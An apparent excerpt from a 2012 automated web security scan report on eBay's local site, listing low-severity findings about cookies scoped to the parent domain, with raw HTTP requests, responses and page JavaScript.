vjo.darwin.globalnav.util.SGuid.writeSessionGuid("ab0f55cc1340a5e2c6324c52ff8bfe90");vjo.darwin.core.ebayheader.rover.FooterRover.roverService("http://rover.ebay.com/idmap/0?footer");; if(vjo && vjo.darwin && vjo.darwin.globalnav && vjo.darwin.globalnav.rtm && vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall)vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall.submitRTMCall("http://ir.ebaystatic.com/v4js/z/ur/grupfpzzoq4wjpypydpyjswhd.js");</script><script src="http://include.ebaystatic.com/js/e687/us/ebayfooter_cobrand_v4_e6871us.js"></script><!--@sgfp@ footerStyle=normal:CGI @egfp@--></div></div><script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?v=3.4&amp;client=gme-ebayinc1&amp;sensor=true"></script><script src="/local/localjs.js"></script><script type="text/javascript">var distances = new Array(0.5, 1, 2, 5, 10, 15, 20, 25, 50, 100);
var _sadis = document.getElementById("_flprad");
// locSliderGetElementByID: Cross-browser version of "document.getElementById()"
function locSliderGetElementById(element) {
   if (document.getElementById) element = document.getElementById(element);
   else if (document.all) element = document.all[element];
   else element = null;
   return element;
}

// locSliderLeft: Cross-browser version of "element.style.left"
function locSliderLeft(elmnt, pos) {
   if (!(elmnt = locSliderGetElementById(elmnt))) return 0;
   if (elmnt.style && (typeof(elmnt.style.left) == 'string')) {
       if (typeof(pos) == 'number') elmnt.style.left = pos + 'px';
       else {
           pos = parseInt(elmnt.style.left);
           if (isNaN(pos)) pos = 0;
       }
   }
   else if (elmnt.style && elmnt.style.pixelLeft) {
       if (typeof(pos) == 'number') elmnt.style.pixelLeft = pos;
       else pos = elmnt.style.pixelLeft;
   }
   return pos;
}

function setPos (distance) {
   var index = 0;
   /*for(var i=0,l=distances.length;i<l; i++){
       if(distance == distances[i]) {
           index = i;
           break;
       }
   }
   var pos = locSliderLeft("slider", (index*12.8)+6);
   document.getElementById("display").innerHTML = distance + " miles"; // put the new value in the slider display element
   document.getElementById("progress").style.width = (pos+30)+"px";*/
   _sadis.value = distance;
}
// slide: Handles the start of a slider move.
function slide(evnt, slider, left, right, display, progress, progressOffset) {
   if (!evnt) {
evnt = window.event;
   }
   sliderObj = locSliderGetElementById(slider);
   displayObj = locSliderGetElementById(display);
   progressObj = locSliderGetElementById(progress);
   progressObjOffset = progressOffset
   xLeft = left;
   xRight = right;
   pxLeft = locSliderLeft(sliderObj.id);
   xStart = evnt.screenX; // Horizontal mouse position at start of slide.
   mouseover = true;
   document.onmousemove = moveSlider; // Start the action if the mouse is dragged.
   document.onmouseup = sliderMouseUp; // Stop sliding.
}

// moveSlider: Handles slider and display while dragging
function moveSlider(evnt) {
   var evnt = (!evnt) ? window.event : evnt; // The mousemove event
   if (mouseover) { // Only if slider is dragged
       x = pxLeft + evnt.screenX - xStart; // Horizontal mouse position relative to allowed slider positions
       // Limit horizontal movement
       if (x > xRight) {
       x = xRight;
       }
       if (x < xLeft) {
        x = xLeft;
       }
       locSliderLeft(sliderObj.id, x); // move slider to new horizontal position
       distance = distances[Math.min(Math.round((x - xLeft) * distances.length / (xRight - xLeft)), distances.length - 1)]; // distance selection
       displayObj.innerHTML = distance + " miles"; // put the new value in the slider display element
       _sadis.value = distance;

       progressObj.style.width = (x + progressObjOffset - xLeft) + "px";
       
       return false
   }
   return
}
// sliderMouseup: Handles the mouseup event after moving a slider.
// Snaps the slider position to allowed/displayed value.
function sliderMouseUp() {
   mouseover = false // Stop the sliding.
   if (document.removeEventListener) { // Remove event listeners from 'document' (Mozilla).
       document.removeEventListener('mousemove', moveSlider, false)
       document.removeEventListener('mouseup', sliderMouseUp, false)
   }
   else if (document.detachEvent) { // Remove event listeners from 'document' (IE).
       document.detachEvent('onmousemove', moveSlider)
       document.detachEvent('onmouseup', sliderMouseUp)
   }
   //document.distanceForm.submit();
   submitDistance();
}

function submitDistance(){
   var t=this, zip = document.getElementById("_fpos"),zipName,disName;
   if(!zip || (zip && !(zipName=zip.getAttribute("name"))) || !_sadis ||(_sadis && !(disName=_sadis.getAttribute("name")))) return;
   var url = document.location.href;
   if(zipName == '_fpos') {
       var value = zip.value;
       url = vjo.dsf.utils.URL.addArg(url, '_fpos', value);
   }
   if(disName == '_flprad') {
       var value1 = _sadis.value;
       url = vjo.dsf.utils.URL.addArg(url, '_flprad', value1);
   }else {
       return;
   }        
   window.location = url;
   }

</script><script type="text/javascript">(function () {
var _r = vjo.Registry;
_r.put('0',new vjo.dsf.utils.SiteSpeed()); })();
(function(){
var _d=vjo.dsf.EventDispatcher;
var _r=vjo.Registry;
_d.add('body','load',function(event) { this.setData({"placeholder":"Enter valid U.S ZIP Code","jsId":"merFs","trkId":"p5791.m1","data":{"numResults":0,"localPickupModel":null,"errorMap":null,"noProductFound":false,"location":"75217","deals":[{"highPrice":null,"highPriceValue":null,"productId":7313225,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":12,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":{"value":2,"id":2,"name":"1-5","integer":2},"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=7313225&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":false,"imageUrl":"http://imagethumbnails.milo.com/008/360/664/200/8360873_13227664_200.jpg","lowPrice":{"valueInMinorUnits":1999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":19990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":12,"title":"Game Party in Motion for Xbox 360 Kinect","offerIds":"8360873","numLocalStore":1,"lowPriceValue":"$19.99","miloProductOfferModel":[{"merchantTitle":"Toys\"R\"Us","merchantId":5893,"linkUrl":null,"location":{"merchantName":"Toys\"R\"Us","latitude":32.874857,"merchantLogoUrl":"http://milo.com/images/stores/5893.jpg","longitude":-96.76977},"RTPalUrl":null,"price":{"valueInMinorUnits":1999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":19990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/5893.png"}],"ratingNode":"<span class=\"rw\" style=\"height: 12px; background-position: 0pt -10px;\">\n <span class=\"rstar\" style=\"height: 12px; background-position: 0pt 1px; width: 20.25px\"><\/span>\n<\/span><span class=\"revCnt\">(12)<\/span>"},{"highPrice":null,"highPriceValue":null,"productId":6752788,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":3,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":{"value":2,"id":2,"name":"1-5","integer":2},"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=6752788&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":false,"imageUrl":"http://imagethumbnails.milo.com/009/042/474/200/9042506_11535474_200.jpg","lowPrice":{"valueInMinorUnits":1999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":19990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":3,"title":"Harry Potter and the Deathly Hallows: Part 1 (Xbox 360)","offerIds":"7806393","numLocalStore":1,"lowPriceValue":"$19.99","miloProductOfferModel":[{"merchantTitle":"Toys\"R\"Us","merchantId":5893,"linkUrl":null,"location":{"merchantName":"Toys\"R\"Us","latitude":32.874857,"merchantLogoUrl":"http://milo.com/images/stores/5893.jpg","longitude":-96.76977},"RTPalUrl":null,"price":{"valueInMinorUnits":1999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":19990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/5893.png"}],"ratingNode":"<span class=\"rw\" style=\"height: 12px; background-position: 0pt -10px;\">\n <span class=\"rstar\" style=\"height: 12px; background-position: 0pt 1px; width: 20.25px\"><\/span>\n<\/span><span class=\"revCnt\">(3)<\/span>"}],"title":"","trkId":null,"localLandingLeftNavModel":null,"numOfResults":0,"topProducts":[{"highPrice":null,"highPriceValue":null,"productId":16570508,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":0,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":null,"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=16570508&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":true,"imageUrl":"http://imagethumbnails.milo.com/011/410/300/200/11410209_18530300_200.jpg","lowPrice":{"valueInMinorUnits":809,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":8090000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":0,"title":"Baby Einstein Baby Take-Along Tunes Infant Toy","offerIds":"11410209","numLocalStore":1,"lowPriceValue":"$8.09","miloProductOfferModel":[{"merchantTitle":"Target","merchantId":1792,"linkUrl":null,"location":{"merchantName":"Target","latitude":32.9274,"merchantLogoUrl":"http://milo.com/images/stores/1792.jpg","longitude":-96.814},"RTPalUrl":null,"price":{"valueInMinorUnits":809,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":8090000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1792.png"}],"ratingNode":null},{"highPrice":{"valueInMinorUnits":29999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":299990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"highPriceValue":"$299.99","productId":4434390,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":6,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":{"value":8,"id":8,"name":"4-5","integer":8},"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=4434390&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":false,"imageUrl":"http://imagethumbnails.milo.com/006/422/170/200/6422484_15811170_200.jpg","lowPrice":{"valueInMinorUnits":29996,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":299960000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":6,"title":"Xbox 360 4GB Console with Kinect for Xbox 360","offerIds":"4438228,4670223,6422484","numLocalStore":3,"lowPriceValue":"$299.96","miloProductOfferModel":[{"merchantTitle":"Fry's Electronics","merchantId":3040,"linkUrl":null,"location":{"merchantName":"Fry's Electronics","latitude":33.008115,"merchantLogoUrl":"http://milo.com/images/stores/3040.jpg","longitude":-96.70534},"RTPalUrl":null,"price":{"valueInMinorUnits":29996,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":299960000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/3040.png"},{"merchantTitle":"Gamestop","merchantId":9386,"linkUrl":null,"location":{"merchantName":"Gamestop","latitude":32.91079,"merchantLogoUrl":"http://milo.com/images/stores/9386.jpg","longitude":-96.95881},"RTPalUrl":null,"price":{"valueInMinorUnits":29999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":299990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/9386.png"},{"merchantTitle":"Sears","merchantId":1609,"linkUrl":null,"location":{"merchantName":"Sears","latitude":33.011124,"merchantLogoUrl":"http://milo.com/images/stores/1609.jpg","longitude":-96.708589},"RTPalUrl":null,"price":{"valueInMinorUnits":29999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":299990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1609.png"}],"ratingNode":"<span class=\"rw\" style=\"height: 12px; background-position: 0pt -10px;\">\n <span class=\"rstar\" style=\"height: 12px; background-position: 0pt 1px; width: 60.75px\"><\/span>\n<\/span><span class=\"revCnt\">(6)<\/span>"}],"ticketModel":null},"zipcode":"75217"}); },vjo.ebay.local.localmap.LocalMap);_d.add('body','load',function(event) { this.init({"leftFsPages":5,"jsId":"localinfoFs","content":true,"rightFs":false,"rightFsPages":0}); },vjo.ebay.local.localinfo.LocalInfo);_d.add('body','load',function(event) { this.init("75217", "1"); },vjo.ebay.local.LocalLandingPage);})();
</script></body></html><!--RcmdId LocalDomain-dcp,RlogId jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3A37dg%60b-134ac89d6eb-->

2.11. http://local.ebay.com/html/disclaimer.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://local.ebay.com
Path:   /html/disclaimer.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

HEAD /html/disclaimer.html HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: local.ebay.com
Cookie: ebay=%5Ecv%3D15555%5E; s=CgAD4ACBPBpOBYWM4OWNlOWUxMzQwYTAyYTA5NTFmZTYxZmZmZmU0NjRx6/Y8; nonsession=CgADKACBYa0OBYWM4OWNlOWUxMzQwYTAyYTA5NTFmZTYxZmZmZmU0NjQAywABTwVJCTH4+iZA
Accept-Encoding: gzip, deflate
Content-Length: 10






Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Dsm%2Bpu%28c5%3Ba6c0-134ac89ec04
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Thu, 05 Jan 2012 06:24:06 GMT
Last-Modified: Fri, 23 Dec 2011 22:10:46 GMT
Set-Cookie: s=CgAD4ACBPBpOHYWM4OWNlOWUxMzQwYTAyYTA5NTFmZTYxZmZmZmU0NjTHxJQW; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgADKACBYa0OHYWM4OWNlOWUxMzQwYTAyYTA5NTFmZTYxZmZmZmU0NjQAywABTwVJDzJH3saa; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:24:07 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 0


2.12. http://local.ebay.com/html/disclaimer.html.nsx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://local.ebay.com
Path:   /html/disclaimer.html.nsx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

HEAD /html/disclaimer.html.nsx HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: local.ebay.com
Cookie: ebay=%5Ecv%3D15555%5E; s=CgAD4ACBPBpOCYWM4OWNlOWUxMzQwYTAyYTA5NTFmZTYxZmZmZmU0NjQq/Ecp; nonsession=CgADKACBYa0OCYWM4OWNlOWUxMzQwYTAyYTA5NTFmZTYxZmZmZmU0NjQAywABTwVJCjJy5a9K
Accept-Encoding: gzip, deflate
Content-Length: 10






Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3Bc6cb0g-134ac8a0a37
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Thu, 05 Jan 2012 06:24:14 GMT
Last-Modified: Fri, 23 Dec 2011 22:10:46 GMT
Set-Cookie: s=CgAD4ACBPBpOPYWM4OWNlOWUxMzQwYTAyYTA5NTFmZTYxZmZmZmU0NjSrIRXP; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgADKACBYa0OPYWM4OWNlOWUxMzQwYTAyYTA5NTFmZTYxZmZmZmU0NjQAywABTwVJFzO7WVri; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:24:14 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 0


2.13. http://local.ebay.com/local  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://local.ebay.com
Path:   /local

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /local HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: local.ebay.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 10






Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Dsm%2Bpu%28c5%3Ba6c0-134ac89d7c1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: ebay=%5Ecv%3D15555%5E; Domain=.ebay.com; Path=/
Set-Cookie: s=CgAD4ACBPBpOCYWM4OWQ3YzExMzQwYTQ3YjMyYzFmZTUxZmZmZmU1NmW5Mjus; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgADKACBYa0OCYWM4OWQ3YzExMzQwYTQ3YjMyYzFmZTUxZmZmZmU1NmUAywABTwVJCjE7Ab8U; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:24:02 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 37015
Date: Thu, 05 Jan 2012 06:24:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>eBay - Local</title><link href="http://www.ebay.com/favicon.ico" rel="icon" type="image/ico"><link href="/local/localcss.css" rel="stylesheet" type="text/css"></head><body id="body"><!--[if lt IE 8 ]> <style type="text/css"> .srpbt{position:relative;width:1%;} .srpi {width:435px;} .zipcode{zoom:1;height:100%;z-index:111} </style><![endif]--><div id="ff-body" class="bdy"><script type="text/javascript">var _GlobalNavHeaderUtf8Encoding=true;</script><script type="text/javascript">var includeHost="http://include.ebaystatic.com/";</script><link rel="stylesheet" type="text/css" href="http://ir.ebaystatic.com/v4css/z/2s/3zhykpa5ca0zthsnrhjg02hpi.css"><script src="http://ir.ebaystatic.com/v4js/z/yo/qicc5beyw2zejm0u4bus2lv3u.js"></script><script type="text/javascript" src="http://ir.ebaystatic.com/v4js/z/qz/kjtciulcyi4gtcfxjs5s2k33m.js"></script><!--[if lt IE 7 ]><div id='gnheader' class='gh-w ie6'><![endif]--><!--[if IE 7]><div id='gnheader' class='gh-w ie7'><![endif]--><!--[if (gt IE 7)|!(IE)]><!--><div id="gnheader" class="gh-w"><!--<![endif]--><a href="#mainContent" rel="nofollow" class="g-hdn">Skip to main content</a><div><div class="gh-eb"><div class="gh-emn"><div class="gh-hid"></div><div class="gh-mn"><span class="gh-fst"><a id="MyEbay" href="http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1" _sp="m570.l2919">My eBay</a></span><a id="Sell" href="http://cgi5.ebay.com/ws/eBayISAPI.dll?aidZ153=&amp;MfcISAPICommand=SellHub3" _sp="m570.l1528">Sell</a><a id="Community" href="http://community.ebay.com" _sp="m570.l1540">Community</a><span class="gh-nho"></span><a id="Help" href="http://ocs.ebay.com/ws/eBayISAPI.dll?CustomerSupport" _sp="m570.l1545">Customer Support</a><span class="gh-nho"><span class="gh-sc" style="display:none" id="GH_Cart"><a href="http://payments.ebay.com/ws/eBayISAPI.dll?ShopCart&amp;ssPageName=CART:HDR"><img src="http://p.ebaystatic.com/aw/pics/buy/cart/iconCart000.gif" alt="Your shopping cart" border="0" height="24" width="31"></img>Cart</a></span><script type="text/javascript">vjo.darwin.globalnav.shoppingcart.ShoppingCart.RefreshCart()</script></span></div></div><form id="headerSearch" name="headerSearch" method="get" action="http://www.ebay.com/sch/i.html"><input type="hidden" name="_from" value="R40"><input type="hidden" name="_trksid" value="m570.l2736"><span class="gh-esb"><label for="_nkw" class="g-hdn">Enter your search keyword</label><input type="text" class="gh-txt" name="_nkw" id="_nkw"><a><input type="submit" value="Go" class="gh-go"></a></span></form></div><div class="gh-log"><span class="gh-lg"><a id="EbayLogo" href="http://www.ebay.com" _sp="m570.l2586"><img src="http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" alt="eBay" border="0" height="45" width="110"></img></a></span><span class="gh-wrap"><span class="gh-shim"></span><span class="greeting gh-ui"><script type="text/javascript">vjo.darwin.core.greetings.VjGreetingsClient.writePersonalHeader("Sign in", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "register", "https://scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo", "Sign out", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "Welcome! ##1## or ##2##.", "Hi, <b>##1##<\/b>! (##2##)", "Hi, <b>##1##<\/b>! (<a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l2620\">Not you<\/a>?)", "Hello! <a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l1524\">Sign in/out<\/a>.", "<img src=\"http://p.ebaystatic.com/aw/pics/icon/iconWarnRed_16x16.gif\" height=\"16\" width=\"16\" alt=\"Alert\">", "<span id=\"bta\">##1##<\/span>", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alert<\/a>.", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alerts<\/a>.", "1", "", true)</script></span><span class="coupon rebate" id="rbt" style="display:none"><img src="http://p.ebaystatic.com/aw/pics/promo/magic/pmoGleam10_150x23.gif" alt="Coupon" border="0" height="23" width="150"></img><!--googleoff: all--> Must use Buy It Now and PayPal.<br/><a href="http://pages.ebay.com/cashbackoffer/terms.html" _sp="m570.l2735">See conditions</a><!--googleon: all--><script type="text/javascript">vjo.darwin.core.ebayheader.rebate.RebateBox.Refresh("rbt", "10", "<img src=\"http://q.ebaystatic.com/aw/pics/icons/iconRedeemCoupon20x20.gif\" alt=\"Coupon\" border=\"0\" height=\"20\" width=\"20\"><\/img><a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyeBay&amp;CurrentPage=MyeBayIncentives&amp;gbh=1\" _sp=\"m570.l2735\">You have coupons available<\/a>")</script></span></span></div><div></div></div><div class="gh-cl"></div><div><div class="gh-col"><b class="gh-c1"></b><b class="gh-c2"></b><b class="gh-c3"></b><b class="gh-c4"></b><b class="gh-c5"></b><b class="gh-c6"></b><b class="gh-c7"></b><div class="gh-clr"></div></div><div id="headerWrapper" class="gh-hbw"><div class="gh-hb"><div class="gh-mn"><a id="BrowseCategories" href="http://shop.ebay.com/allcategories/all-categories" _sp="m570.l1620">CATEGORIES</a><a id="chevron0" href="javascript:;" class="gh-ai"><b>&nbsp;</b></a><a id="EbayElectronics" title="Your shopping destination for the best selection and value in electronics and accessories" href="http://www.ebay.com/electronics/" _sp="m570.l2959">ELECTRONICS</a><span id="11450_sp"><a title="Your new destination for Clothing, Shoes &amp; Accessories on eBay." href="http://www.ebay.com/fashion/" _sp="m570.l2624">FASHION</a></span><a id="6000_sp" title="Buy and sell cars, trucks, vehicle parts, and accessories." href="http://www.motors.ebay.com/" _sp="m570.l2597">MOTORS</a><a id="EbayTickets" title="Tickets ... Sports, Concerts, Theater and More on eBay" href="http://www.ebay.com/tickets" _sp="m570.l1624">TICKETS</a><a id="172382_sp" title="Great items, deep discounts, and free shipping!" href="http://deals.ebay.com/" _sp="m570.l2625">DEALS</a><a id="EbayClassifieds" href="http://www.ebayclassifieds.com" _sp="m570.l2626">CLASSIFIEDS</a></div></div><div class="gh-lbh1"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_876"></div></div></div><div class="gh-lbh2"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_912"></div></div></div><div class="gh-lbh3"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_433"></div></div></div><div class="gh-clr"></div></div><img src="http://rover.ebay.com/roversync/?site=0&amp;stg=1&amp;mpt=1325721178644" alt="" width="1" height="1"><script type="text/javascript">var svrGMT = 1325721178644;var scbps=0;var scPageName='GlobalHeader:3872';</script><div class="gh-ovr" id="gbh_ovl"><div class="gh-iovr"></div></div></div><a name="mainContent"></a></div><script src="http://include.ebaystatic.com/js/e723/us/ebaybase_v4_e7231us.js"></script><script src="http://include.ebaystatic.com/js/e681/us/ebaysup_e6811us.js"></script><script type="text/javascript">if(document.documentMode != 8 && document.compatMode != "CSS1Compat") ebay.oDocument._getControl("headerCommon")._exec("writeStyleSheet");</script><script type="text/javascript">vjo.Registry.put('bta', new vjo.darwin.globalnav.bta.BuyerTransactionAlert("bta", 60, 2, 2, "http://bmsgs.ebay.com/ws/eBayISAPI.dll?GetBuyerTransactionAlerts", "http://q.ebaystatic.com/aw/pics/", "http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem", "Watched Item ending soon!", "You've been outbid!", "You've received a Second Chance Offer", "You've received a Transaction Confirmation Request."));
vjo.darwin.globalnav.util.EventReg.aggregate(vjo.Registry._bta.onRefreshHdl());
vjo.darwin.globalnav.util.EventReg.browseCategories("BrowseCategoriesMenu", "http://include.ebaystatic.com/categoryjs/99/en_US_MAIN/category_99en_US_MAIN0.js");
vjo.darwin.globalnav.util.EventReg.impression("AI9IFZhI*");
